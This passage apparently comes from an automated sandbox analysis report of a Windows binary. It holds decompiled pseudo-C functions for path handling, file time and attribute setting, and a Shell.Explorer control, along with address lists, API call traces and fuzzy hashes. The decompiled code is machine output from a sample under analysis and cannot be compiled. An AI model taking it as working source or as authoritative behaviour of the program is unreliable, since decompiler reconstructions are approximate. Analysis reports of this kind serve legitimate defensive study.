                                                                                                                                                    0x0123a9ef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a9eb
                                                                                                                                                    0x0123aa04
                                                                                                                                                    0x0123aa06
                                                                                                                                                    0x0123aa09
                                                                                                                                                    0x0123aa22
                                                                                                                                                    0x0123aa22
                                                                                                                                                    0x0123aa24
                                                                                                                                                    0x0123aa27
                                                                                                                                                    0x0123aa37
                                                                                                                                                    0x0123aa39
                                                                                                                                                    0x0123aa39
                                                                                                                                                    0x0123aa29
                                                                                                                                                    0x0123aa29
                                                                                                                                                    0x0123aa2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aa2e
                                                                                                                                                    0x0123aa2e
                                                                                                                                                    0x0123aa31
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aa33
                                                                                                                                                    0x0123aa33
                                                                                                                                                    0x0123aa33
                                                                                                                                                    0x0123aa31
                                                                                                                                                    0x0123aa2c
                                                                                                                                                    0x0123aa47
                                                                                                                                                    0x0123aa4b
                                                                                                                                                    0x0123aa59
                                                                                                                                                    0x0123aa5e
                                                                                                                                                    0x0123aa73
                                                                                                                                                    0x0123aa75
                                                                                                                                                    0x0123aa7b
                                                                                                                                                    0x0123aa7e
                                                                                                                                                    0x0123aab0
                                                                                                                                                    0x0123aab0
                                                                                                                                                    0x0123aab5
                                                                                                                                                    0x0123aabb
                                                                                                                                                    0x0123aabb
                                                                                                                                                    0x0123aac2
                                                                                                                                                    0x0123aadc
                                                                                                                                                    0x0123aadc
                                                                                                                                                    0x0123aadd
                                                                                                                                                    0x0123aae3
                                                                                                                                                    0x0123aae9
                                                                                                                                                    0x0123aaea
                                                                                                                                                    0x0123aaeb
                                                                                                                                                    0x0123aaf0
                                                                                                                                                    0x0123aaf3
                                                                                                                                                    0x0123aaf5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aac4
                                                                                                                                                    0x0123aac4
                                                                                                                                                    0x0123aaca
                                                                                                                                                    0x0123aacc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aace
                                                                                                                                                    0x0123aace
                                                                                                                                                    0x0123aad1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aad3
                                                                                                                                                    0x0123aad3
                                                                                                                                                    0x0123aada
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aada
                                                                                                                                                    0x0123aad1
                                                                                                                                                    0x0123aacc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aaf7
                                                                                                                                                    0x0123aaff
                                                                                                                                                    0x0123ab05
                                                                                                                                                    0x0123ab07
                                                                                                                                                    0x0123ab07
                                                                                                                                                    0x0123ab0f
                                                                                                                                                    0x0123ab14
                                                                                                                                                    0x0123ab1c
                                                                                                                                                    0x0123ab1f
                                                                                                                                                    0x0123ab21
                                                                                                                                                    0x0123ab35
                                                                                                                                                    0x0123ab3a
                                                                                                                                                    0x0123aa80
                                                                                                                                                    0x0123aa80
                                                                                                                                                    0x0123aa81
                                                                                                                                                    0x0123aa82
                                                                                                                                                    0x0123aa83
                                                                                                                                                    0x0123aa84
                                                                                                                                                    0x0123aa8c
                                                                                                                                                    0x0123aa8c
                                                                                                                                                    0x0123aa8c
                                                                                                                                                    0x0123aa8e
                                                                                                                                                    0x0123aa91
                                                                                                                                                    0x0123aa94
                                                                                                                                                    0x0123aa94
                                                                                                                                                    0x0123aa0b
                                                                                                                                                    0x0123aa0e
                                                                                                                                                    0x0123aa10
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aa12
                                                                                                                                                    0x0123aa12
                                                                                                                                                    0x0123aa15
                                                                                                                                                    0x0123aa16
                                                                                                                                                    0x0123aa17
                                                                                                                                                    0x0123aa18
                                                                                                                                                    0x0123aa1d
                                                                                                                                                    0x0123aa10
                                                                                                                                                    0x0123aa9c
                                                                                                                                                    0x0123aaa1
                                                                                                                                                    0x0123aaac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a97a
                                                                                                                                                    0x0123a94e
                                                                                                                                                    0x0123a950
                                                                                                                                                    0x0123a9ac
                                                                                                                                                    0x0123a9b0
                                                                                                                                                    0x0123a9b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a8e5
                                                                                                                                                    0x0123a8e8
                                                                                                                                                    0x0123a8eb
                                                                                                                                                    0x0123a8ee
                                                                                                                                                    0x0123a8f1
                                                                                                                                                    0x0123a8f4
                                                                                                                                                    0x0123a8f7
                                                                                                                                                    0x0123a8f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a8b4
                                                                                                                                                    0x0123a896
                                                                                                                                                    0x0123a896
                                                                                                                                                    0x0123a902
                                                                                                                                                    0x0123a904
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a909
                                                                                                                                                    0x0123a7d8
                                                                                                                                                    0x0123a7d8
                                                                                                                                                    0x0123a7db
                                                                                                                                                    0x0123a7e4
                                                                                                                                                    0x0123a7e7
                                                                                                                                                    0x0123a7ee
                                                                                                                                                    0x0123a7f0
                                                                                                                                                    0x0123a809
                                                                                                                                                    0x0123a80a
                                                                                                                                                    0x0123a80b
                                                                                                                                                    0x0123a80d
                                                                                                                                                    0x0123a812
                                                                                                                                                    0x0123a7f2
                                                                                                                                                    0x0123a7f2
                                                                                                                                                    0x0123a7f5
                                                                                                                                                    0x0123a7f6
                                                                                                                                                    0x0123a7f8
                                                                                                                                                    0x0123a7fa
                                                                                                                                                    0x0123a7fc
                                                                                                                                                    0x0123a801
                                                                                                                                                    0x0123a801
                                                                                                                                                    0x0123a815
                                                                                                                                                    0x0123a817
                                                                                                                                                    0x0123a819
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a81f
                                                                                                                                                    0x0123a822
                                                                                                                                                    0x0123a824
                                                                                                                                                    0x0123a826
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a828
                                                                                                                                                    0x0123a828
                                                                                                                                                    0x0123a82b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a82b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a826
                                                                                                                                                    0x0123a90a
                                                                                                                                                    0x0123a90d
                                                                                                                                                    0x0123a912
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a915
                                                                                                                                                    0x0123a7a8
                                                                                                                                                    0x0123a7a8
                                                                                                                                                    0x0123a7af
                                                                                                                                                    0x0123a7b0
                                                                                                                                                    0x0123a7b2
                                                                                                                                                    0x0123a7b7
                                                                                                                                                    0x0123a916
                                                                                                                                                    0x0123a91a
                                                                                                                                                    0x0123a91a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0123A904
                                                                                                                                                      • Part of subcall function 012386C9: IsProcessorFeaturePresent.KERNEL32(00000017,012386B8,0000002C,0124AC20,0123B8E6,00000000,00000000,01238EA8,?,?,012386C5,00000000,00000000,00000000,00000000,00000000), ref: 012386CB
                                                                                                                                                      • Part of subcall function 012386C9: GetCurrentProcess.KERNEL32(C0000417,0124AC20,0000002C,012383F6,00000016,01238EA8), ref: 012386ED
                                                                                                                                                      • Part of subcall function 012386C9: TerminateProcess.KERNEL32(00000000), ref: 012386F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                    • String ID: *?$.
                                                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                                                    • Opcode ID: 7862bbd4a364659598cbf5db2284bf22e5480a30c37370ad1f5e95b10fff7af4
                                                                                                                                                    • Instruction ID: 31771fc25b649483a43669218cd396c81d63111037447cc27f8f1adc7d3345fa
                                                                                                                                                    • Opcode Fuzzy Hash: 7862bbd4a364659598cbf5db2284bf22e5480a30c37370ad1f5e95b10fff7af4
                                                                                                                                                    • Instruction Fuzzy Hash: 6751B1B5E1020AAFDF15CFA8C880ABDBBB5EF98310F258179D584E7341E6319A028B50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01217704, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E01217704(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0122E0E4(E01241C30, _t108);
				E0122E1C0();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0121FD96(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E01217907(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4080, 0x800);
					_t113 =  *((short*)(_t108 - 0x4080)) - 0x3a;
					if( *((short*)(_t108 - 0x4080)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0121FD6E(__eflags, _t108 - 0x1014, _t108 - 0x4080, _t101);
							E01217098(_t108 - 0x3080);
							_push(0);
							_t54 = E0121A406(_t108 - 0x3080, _t99, __eflags, _t106, _t108 - 0x3080);
							_t85 =  *(_t108 - 0x2078);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0121A384(_t106, _t85 & 0xfffffffe);
							}
							E012195B6(_t108 - 0x2038);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E01219E0F(_t108 - 0x2038, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2038);
								_push(0);
								_t68 = E01213B26(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E01219670(_t108 - 0x2038);
								}
							}
							E012195B6(_t108 - 0x50a4);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E01219950(_t108 - 0x50a4, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a0), _t108 - 0x2058, _t108 - 0x2050, _t108 - 0x2048);
								}
							}
							E0121A384(_t106,  *(_t108 - 0x2078));
							E012195E8(_t108 - 0x50a4, _t106);
							_t90 = _t108 - 0x2038;
						} else {
							E012195B6(_t108 - 0x60c8);
							_push(1);
							_push(_t108 - 0x60c8);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E01213B26(_t81, _t99);
							_t90 = _t108 - 0x60c8;
						}
						_t61 = E012195E8(_t90, _t106);
					} else {
						E01217032(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E01216F5B(0x124ff50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0121FD96(_t108 - 0x1014, 0x1242760, 0x802);
					E0121FD6E(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}















                                                                                                                                                    0x01217704
                                                                                                                                                    0x01217709
                                                                                                                                                    0x01217713
                                                                                                                                                    0x0121771a
                                                                                                                                                    0x01217723
                                                                                                                                                    0x01217752
                                                                                                                                                    0x01217752
                                                                                                                                                    0x01217760
                                                                                                                                                    0x01217765
                                                                                                                                                    0x01217765
                                                                                                                                                    0x01217775
                                                                                                                                                    0x0121777a
                                                                                                                                                    0x01217782
                                                                                                                                                    0x012177a1
                                                                                                                                                    0x012177a5
                                                                                                                                                    0x012177e2
                                                                                                                                                    0x012177ed
                                                                                                                                                    0x012177fa
                                                                                                                                                    0x012177fd
                                                                                                                                                    0x01217802
                                                                                                                                                    0x01217808
                                                                                                                                                    0x0121780b
                                                                                                                                                    0x0121780e
                                                                                                                                                    0x01217810
                                                                                                                                                    0x01217815
                                                                                                                                                    0x01217815
                                                                                                                                                    0x01217820
                                                                                                                                                    0x0121782d
                                                                                                                                                    0x0121783b
                                                                                                                                                    0x01217840
                                                                                                                                                    0x01217842
                                                                                                                                                    0x01217844
                                                                                                                                                    0x0121784d
                                                                                                                                                    0x0121784e
                                                                                                                                                    0x0121784f
                                                                                                                                                    0x01217854
                                                                                                                                                    0x01217856
                                                                                                                                                    0x0121785e
                                                                                                                                                    0x0121785e
                                                                                                                                                    0x01217856
                                                                                                                                                    0x01217869
                                                                                                                                                    0x0121786e
                                                                                                                                                    0x01217872
                                                                                                                                                    0x01217876
                                                                                                                                                    0x01217881
                                                                                                                                                    0x01217886
                                                                                                                                                    0x01217888
                                                                                                                                                    0x012178a5
                                                                                                                                                    0x012178a5
                                                                                                                                                    0x01217888
                                                                                                                                                    0x012178b2
                                                                                                                                                    0x012178bd
                                                                                                                                                    0x012178c2
                                                                                                                                                    0x012177a7
                                                                                                                                                    0x012177ad
                                                                                                                                                    0x012177b2
                                                                                                                                                    0x012177bc
                                                                                                                                                    0x012177bd
                                                                                                                                                    0x012177c0
                                                                                                                                                    0x012177c3
                                                                                                                                                    0x012177c8
                                                                                                                                                    0x012177c8
                                                                                                                                                    0x012178c8
                                                                                                                                                    0x01217784
                                                                                                                                                    0x0121778b
                                                                                                                                                    0x01217797
                                                                                                                                                    0x01217797
                                                                                                                                                    0x012178d3
                                                                                                                                                    0x012178dd
                                                                                                                                                    0x012178dd
                                                                                                                                                    0x01217725
                                                                                                                                                    0x01217729
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121772b
                                                                                                                                                    0x0121772b
                                                                                                                                                    0x0121773d
                                                                                                                                                    0x0121774b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121774b

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 01217709
                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 012178A5
                                                                                                                                                      • Part of subcall function 0121A384: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0121A1BA,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A398
                                                                                                                                                      • Part of subcall function 0121A384: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0121A1BA,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A3C9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Attributes$H_prologTime
                                                                                                                                                    • String ID: :
                                                                                                                                                    • API String ID: 1861295151-336475711
                                                                                                                                                    • Opcode ID: debcd85952f86cc214346088745322c2b58f398f4cca7de631418cc9932bec76
                                                                                                                                                    • Instruction ID: 08be2c9afc5e0a3e16ce3061fe1e91c10f8a4ed924b41053d95fe8ad6ece4126
                                                                                                                                                    • Opcode Fuzzy Hash: debcd85952f86cc214346088745322c2b58f398f4cca7de631418cc9932bec76
                                                                                                                                                    • Instruction Fuzzy Hash: 36419071820219AAEF34EB50DC54EFEB7BDAFB1300F0040E9B609A7085DB705B89DB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121B5AC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E0121B5AC(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0122E1C0();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0121B746(_t71);
					_t66 = E012333F3(_t71);
					_t30 = E0121B772(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0121B84D( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0121B147(__eflags,  &_v4100, 0x800);
							_t39 = E012333F3( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0121FD96(_a8, L"\\\\?\\", _t69);
							E0121FD6E(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0121B84D(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0121FD6E(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0121FD96(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0121FD6E(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0121B746(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0121FD96(_a8, L"\\\\?\\", _t73);
						E0121FD6E(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0121FD96(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                                                                                                                                                    0x0121b5b4
                                                                                                                                                    0x0121b5ba
                                                                                                                                                    0x0121b5c1
                                                                                                                                                    0x0121b5cd
                                                                                                                                                    0x0121b5da
                                                                                                                                                    0x0121b5dc
                                                                                                                                                    0x0121b5e1
                                                                                                                                                    0x0121b5e3
                                                                                                                                                    0x0121b669
                                                                                                                                                    0x0121b66f
                                                                                                                                                    0x0121b671
                                                                                                                                                    0x0121b730
                                                                                                                                                    0x0121b730
                                                                                                                                                    0x0121b730
                                                                                                                                                    0x0121b732
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b733
                                                                                                                                                    0x0121b677
                                                                                                                                                    0x0121b679
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b688
                                                                                                                                                    0x0121b68a
                                                                                                                                                    0x0121b6cf
                                                                                                                                                    0x0121b6db
                                                                                                                                                    0x0121b6e5
                                                                                                                                                    0x0121b6e9
                                                                                                                                                    0x0121b6eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b6f6
                                                                                                                                                    0x0121b706
                                                                                                                                                    0x0121b70b
                                                                                                                                                    0x0121b70f
                                                                                                                                                    0x0121b71b
                                                                                                                                                    0x0121b71d
                                                                                                                                                    0x0121b71f
                                                                                                                                                    0x0121b71f
                                                                                                                                                    0x0121b71f
                                                                                                                                                    0x0121b71d
                                                                                                                                                    0x0121b722
                                                                                                                                                    0x0121b722
                                                                                                                                                    0x0121b723
                                                                                                                                                    0x0121b723
                                                                                                                                                    0x0121b724
                                                                                                                                                    0x0121b724
                                                                                                                                                    0x0121b727
                                                                                                                                                    0x0121b72c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b72c
                                                                                                                                                    0x0121b68c
                                                                                                                                                    0x0121b68f
                                                                                                                                                    0x0121b692
                                                                                                                                                    0x0121b694
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b6a3
                                                                                                                                                    0x0121b6aa
                                                                                                                                                    0x0121b6bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b6bc
                                                                                                                                                    0x0121b5e6
                                                                                                                                                    0x0121b5eb
                                                                                                                                                    0x0121b5ed
                                                                                                                                                    0x0121b615
                                                                                                                                                    0x0121b616
                                                                                                                                                    0x0121b619
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b61f
                                                                                                                                                    0x0121b622
                                                                                                                                                    0x0121b625
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b62b
                                                                                                                                                    0x0121b62e
                                                                                                                                                    0x0121b631
                                                                                                                                                    0x0121b633
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b642
                                                                                                                                                    0x0121b650
                                                                                                                                                    0x0121b655
                                                                                                                                                    0x0121b656
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b656
                                                                                                                                                    0x0121b5ef
                                                                                                                                                    0x0121b5f2
                                                                                                                                                    0x0121b5f5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b606
                                                                                                                                                    0x0121b60b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b5c3
                                                                                                                                                    0x0121b5c3
                                                                                                                                                    0x0121b734
                                                                                                                                                    0x0121b738
                                                                                                                                                    0x0121b738

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                                    • API String ID: 0-253988292
                                                                                                                                                    • Opcode ID: 4d9cc74e9bc76ce421a68a2490ebc46a1d4e141c8fb6bc63b164b21d67b2e57c
                                                                                                                                                    • Instruction ID: a3486d95bd199f36602332cfa3369d15b8d5dee3b4a9e6fcc440acdf92126261
                                                                                                                                                    • Opcode Fuzzy Hash: 4d9cc74e9bc76ce421a68a2490ebc46a1d4e141c8fb6bc63b164b21d67b2e57c
                                                                                                                                                    • Instruction Fuzzy Hash: 4C41DE3287021ABADB25EF61DC80EFF3BF9EF75390B044065F964A3118DB709945CAA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01228F06, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E01228F06(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E0122E0A0(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E0122875E(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E0122977F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E012299DE();
					E01229974( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E01229871( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E01228976(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0x1242260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0x1242260(_t58, 0x12443fc, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0x1242260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}



















                                                                                                                                                    0x01228f06
                                                                                                                                                    0x01228f08
                                                                                                                                                    0x01228f0b
                                                                                                                                                    0x01228f11
                                                                                                                                                    0x01228f14
                                                                                                                                                    0x01228f19
                                                                                                                                                    0x01228f20
                                                                                                                                                    0x01228f2b
                                                                                                                                                    0x01228f2b
                                                                                                                                                    0x01228f22
                                                                                                                                                    0x01228f24
                                                                                                                                                    0x01228f24
                                                                                                                                                    0x01228f2d
                                                                                                                                                    0x01228f32
                                                                                                                                                    0x01228fe5
                                                                                                                                                    0x01228f38
                                                                                                                                                    0x01228f39
                                                                                                                                                    0x01228f44
                                                                                                                                                    0x01228f4c
                                                                                                                                                    0x01228f4e
                                                                                                                                                    0x01228f58
                                                                                                                                                    0x01228f60
                                                                                                                                                    0x01228f65
                                                                                                                                                    0x01228f69
                                                                                                                                                    0x01228faa
                                                                                                                                                    0x01228faa
                                                                                                                                                    0x01228fae
                                                                                                                                                    0x01228fb2
                                                                                                                                                    0x01228fb7
                                                                                                                                                    0x01228fbc
                                                                                                                                                    0x01228fbf
                                                                                                                                                    0x01228fc0
                                                                                                                                                    0x01228fc3
                                                                                                                                                    0x01228fc5
                                                                                                                                                    0x01228fc6
                                                                                                                                                    0x01228fc7
                                                                                                                                                    0x01228fcb
                                                                                                                                                    0x01228fd2
                                                                                                                                                    0x01228fcd
                                                                                                                                                    0x01228fcd
                                                                                                                                                    0x01228fcd
                                                                                                                                                    0x01228fd8
                                                                                                                                                    0x01228fde
                                                                                                                                                    0x01228fde
                                                                                                                                                    0x01228fe1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01228fe1
                                                                                                                                                    0x01228f6e
                                                                                                                                                    0x01228f6e
                                                                                                                                                    0x01228f7d
                                                                                                                                                    0x01228f81
                                                                                                                                                    0x01228f87
                                                                                                                                                    0x01228f94
                                                                                                                                                    0x01228f9a
                                                                                                                                                    0x01228f9f
